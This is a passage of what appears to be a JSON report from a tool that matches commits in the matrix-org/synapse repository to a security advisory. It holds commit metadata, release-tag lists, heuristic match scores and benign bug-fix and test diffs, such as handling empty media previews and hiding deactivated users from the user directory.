"v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8970, 8970", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: homeserver, server", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8970", + "relevance": 2 + } + ] + }, + { + "commit_id": "1f3748f03398f8f91ec5121312aa79dd58306ec1", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607353208, + "hunks": 13, + "message": "Do not raise a 500 exception when previewing empty media. (#8883)", + "diff": [ + "diff --git a/changelog.d/8883.bugfix b/changelog.d/8883.bugfix", + "new file mode 100644", + "index 000000000..6137fc5b2", + "--- /dev/null", + "+++ b/changelog.d/8883.bugfix", + "@@ -0,0 +1 @@", + "+Fix a 500 error when attempting to preview an empty HTML file.", + "diff --git a/synapse/rest/media/v1/preview_url_resource.py b/synapse/rest/media/v1/preview_url_resource.py", + "index dce6c4d16..1082389d9 100644", + "--- a/synapse/rest/media/v1/preview_url_resource.py", + "+++ b/synapse/rest/media/v1/preview_url_resource.py", + "@@ -678,3 +678,7 @@ class PreviewUrlResource(DirectServeJsonResource):", + "-def decode_and_calc_og(body, media_uri, request_encoding=None):", + "+def decode_and_calc_og(body, media_uri, request_encoding=None) -> Dict[str, str]:", + "+ # If there's no body, nothing useful is going to be found.", + "+ if not body:", + "+ return {}", + "+", + " from lxml import etree", + "diff --git a/tests/test_preview.py b/tests/test_preview.py", + "index 7f67ee9e1..a883d707d 100644", + "--- a/tests/test_preview.py", + "+++ b/tests/test_preview.py", + "@@ -58,3 +58,3 @@ class PreviewTestCase(unittest.TestCase):", + "- self.assertEquals(", + "+ self.assertEqual(", + " desc,", + "@@ -71,3 +71,3 @@ class PreviewTestCase(unittest.TestCase):", + "- self.assertEquals(", + "+ self.assertEqual(", + " desc,", + "@@ -98,3 +98,3 @@ class PreviewTestCase(unittest.TestCase):", + "- self.assertEquals(", + "+ self.assertEqual(", + " desc,", + "@@ -124,3 +124,3 @@ class PreviewTestCase(unittest.TestCase):", + " desc = summarize_paragraphs(example_paras, min_size=200, max_size=500)", + "- self.assertEquals(", + "+ self.assertEqual(", + " desc,", + "@@ -151,3 +151,3 @@ class PreviewUrlTestCase(unittest.TestCase):", + "- self.assertEquals(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", + "+ self.assertEqual(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", + "@@ -166,3 +166,3 @@ class PreviewUrlTestCase(unittest.TestCase):", + "- self.assertEquals(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", + "+ self.assertEqual(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", + "@@ -184,3 +184,3 @@ class PreviewUrlTestCase(unittest.TestCase):", + "- self.assertEquals(", + "+ self.assertEqual(", + " og,", + "@@ -205,3 +205,3 @@ class PreviewUrlTestCase(unittest.TestCase):", + "- self.assertEquals(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", + "+ self.assertEqual(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", + "@@ -218,3 +218,3 @@ class PreviewUrlTestCase(unittest.TestCase):", + "- self.assertEquals(og, {\"og:title\": None, \"og:description\": \"Some text.\"})", + "+ self.assertEqual(og, {\"og:title\": None, \"og:description\": \"Some text.\"})", + "@@ -232,3 +232,3 @@ class PreviewUrlTestCase(unittest.TestCase):", + "- self.assertEquals(og, {\"og:title\": \"Title\", \"og:description\": \"Some text.\"})", + "+ self.assertEqual(og, {\"og:title\": \"Title\", \"og:description\": \"Some text.\"})", + "@@ -246,2 +246,7 @@ class PreviewUrlTestCase(unittest.TestCase):", + "- self.assertEquals(og, {\"og:title\": None, \"og:description\": \"Some text.\"})", + "+ self.assertEqual(og, {\"og:title\": None, \"og:description\": \"Some text.\"})", + "+", + "+ def test_empty(self):", + "+ html = \"\"", + "+ og = decode_and_calc_og(html, \"http://example.com/test.html\")", + "+ self.assertEqual(og, {})" + ], + "changed_files": [ + "changelog.d/8883.bugfix", + "synapse/rest/media/v1/preview_url_resource.py", + "tests/test_preview.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8883": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8883, 8883", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: resource", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8883", + "relevance": 2 + } + ] + }, + { + "commit_id": "651e1ae534c3cbe65d41115d8fb91bca08b22009", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608130381, + "hunks": 0, + "message": "Merge pull request #8946 from matrix-org/rav/refactor_send_request Remove `Request` return value from `make_request`", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8946": "Implement a username picker for synapse #8942 Fix UsersListTestCase #8964" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8946, 8946", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: request", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8946", + "relevance": 2 + } + ] + }, + { + "commit_id": "c07022303ef596fe7f42f6eb7001660a62801715", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608206739, + "hunks": 8, + "message": "Fix a bug that deactivated users appear in the directory (#8933) Fixes a bug that deactivated users appear in the directory when their profile information was updated. To change profile information of deactivated users is neccesary for example you will remove displayname or avatar. But they should not appear in directory. They are deactivated. Co-authored-by: Erik Johnston ", + "diff": [ + "diff --git a/changelog.d/8933.bugfix b/changelog.d/8933.bugfix", + "new file mode 100644", + "index 000000000..295933d6c", + "--- /dev/null", + "+++ b/changelog.d/8933.bugfix", + "@@ -0,0 +1 @@", + "+Fix a bug where deactivated users appeared in the user directory when their profile information was updated.", + "diff --git a/synapse/handlers/user_directory.py b/synapse/handlers/user_directory.py", + "index 3d80371f0..7c4eeaaa5 100644", + "--- a/synapse/handlers/user_directory.py", + "+++ b/synapse/handlers/user_directory.py", + "@@ -115,5 +115,9 @@ class UserDirectoryHandler(StateDeltasHandler):", + " # the other changes.", + "- is_support = await self.store.is_support_user(user_id)", + "+", + " # Support users are for diagnostics and should not appear in the user directory.", + "- if not is_support:", + "+ is_support = await self.store.is_support_user(user_id)", + "+ # When change profile information of deactivated user it should not appear in the user directory.", + "+ is_deactivated = await self.store.get_user_deactivated_status(user_id)", + "+", + "+ if not (is_support or is_deactivated):", + " await self.store.update_profile_in_user_dir(", + "diff --git a/tests/handlers/test_user_directory.py b/tests/handlers/test_user_directory.py", + "index 1260721db..9c886d671 100644", + "--- a/tests/handlers/test_user_directory.py", + "+++ b/tests/handlers/test_user_directory.py", + "@@ -56,2 +56,6 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", + " )", + "+ regular_user_id = \"@regular:test\"", + "+ self.get_success(", + "+ self.store.register_user(user_id=regular_user_id, password_hash=None)", + "+ )", + "@@ -65,3 +69,2 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", + " profile_info = ProfileInfo(avatar_url=\"avatar_url\", display_name=display_name)", + "- regular_user_id = \"@regular:test\"", + " self.get_success(", + "@@ -72,2 +75,37 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", + "+ def test_handle_local_profile_change_with_deactivated_user(self):", + "+ # create user", + "+ r_user_id = \"@regular:test\"", + "+ self.get_success(", + "+ self.store.register_user(user_id=r_user_id, password_hash=None)", + "+ )", + "+", + "+ # update profile", + "+ display_name = \"Regular User\"", + "+ profile_info = ProfileInfo(avatar_url=\"avatar_url\", display_name=display_name)", + "+ self.get_success(", + "+ self.handler.handle_local_profile_change(r_user_id, profile_info)", + "+ )", + "+", + "+ # profile is in directory", + "+ profile = self.get_success(self.store.get_user_in_directory(r_user_id))", + "+ self.assertTrue(profile[\"display_name\"] == display_name)", + "+", + "+ # deactivate user", + "+ self.get_success(self.store.set_user_deactivated_status(r_user_id, True))", + "+ self.get_success(self.handler.handle_user_deactivated(r_user_id))", + "+", + "+ # profile is not in directory", + "+ profile = self.get_success(self.store.get_user_in_directory(r_user_id))", + "+ self.assertTrue(profile is None)", + "+", + "+ # update profile after deactivation", + "+ self.get_success(", + "+ self.handler.handle_local_profile_change(r_user_id, profile_info)", + "+ )", + "+", + "+ # profile is furthermore not in directory", + "+ profile = self.get_success(self.store.get_user_in_directory(r_user_id))", + "+ self.assertTrue(profile is None)", + "+", + " def test_handle_user_deactivated_support_user(self):", + "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", + "index 4f379a5e5..9d6ef0251 100644", + "--- a/tests/rest/admin/test_user.py", + "+++ b/tests/rest/admin/test_user.py", + "@@ -605,3 +605,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- self.other_user = self.register_user(\"user\", \"pass\")", + "+ self.other_user = self.register_user(\"user\", \"pass\", displayname=\"User\")", + " self.other_user_token = self.login(\"user\", \"pass\")", + "@@ -1014,2 +1014,50 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "+ @override_config({\"user_directory\": {\"enabled\": True, \"search_all_users\": True}})", + "+ def test_change_name_deactivate_user_user_directory(self):", + "+ \"\"\"", + "+ Test change profile information of a deactivated user and", + "+ check that it does not appear in user directory", + "+ \"\"\"", + "+", + "+ # is in user directory", + "+ profile = self.get_success(self.store.get_user_in_directory(self.other_user))", + "+ self.assertTrue(profile[\"display_name\"] == \"User\")", + "+", + "+ # Deactivate user", + "+ body = json.dumps({\"deactivated\": True})", + "+", + "+ request, channel = self.make_request(", + "+ \"PUT\",", + "+ self.url_other_user,", + "+ access_token=self.admin_user_tok,", + "+ content=body.encode(encoding=\"utf_8\"),", + "+ )", + "+", + "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "+ self.assertEqual(\"@user:test\", channel.json_body[\"name\"])", + "+ self.assertEqual(True, channel.json_body[\"deactivated\"])", + "+", + "+ # is not in user directory", + "+ profile = self.get_success(self.store.get_user_in_directory(self.other_user))", + "+ self.assertTrue(profile is None)", + "+", + "+ # Set new displayname user", + "+ body = json.dumps({\"displayname\": \"Foobar\"})", + "+", + "+ request, channel = self.make_request(", + "+ \"PUT\",", + "+ self.url_other_user,", + "+ access_token=self.admin_user_tok,", + "+ content=body.encode(encoding=\"utf_8\"),", + "+ )", + "+", + "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "+ self.assertEqual(\"@user:test\", channel.json_body[\"name\"])", + "+ self.assertEqual(True, channel.json_body[\"deactivated\"])", + "+ self.assertEqual(\"Foobar\", channel.json_body[\"displayname\"])", + "+", + "+ # is not in user directory", + "+ profile = self.get_success(self.store.get_user_in_directory(self.other_user))", + "+ self.assertTrue(profile is None)", + "+", + " def test_reactivate_user(self):" + ], + "changed_files": [ + "changelog.d/8933.bugfix", + "synapse/handlers/user_directory.py", + "tests/handlers/test_user_directory.py", + "tests/rest/admin/test_user.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8933": "Fix UsersListTestCase #8964" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8933, 8933", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: file", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8933", + "relevance": 2 + } + ] + }, + { + "commit_id": "01333681bc3db22541b49c194f5121a5415731c6", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608065770, + "hunks": 32, + "message": "Preparatory refactoring of the SamlHandlerTestCase (#8938) * move simple_async_mock to test_utils ... so that it can be re-used * Remove references to `SamlHandler._map_saml_response_to_user` from tests This method is going away, so we can no longer use it as a test point. Instead, factor out a higher-level method which takes a SAML object, and verify correct behaviour by mocking out `AuthHandler.complete_sso_login`. * changelog", + "diff": [ + "diff --git a/changelog.d/8938.feature b/changelog.d/8938.feature", + "new file mode 100644", + "index 000000000..d450ef499", + "--- /dev/null", + "+++ 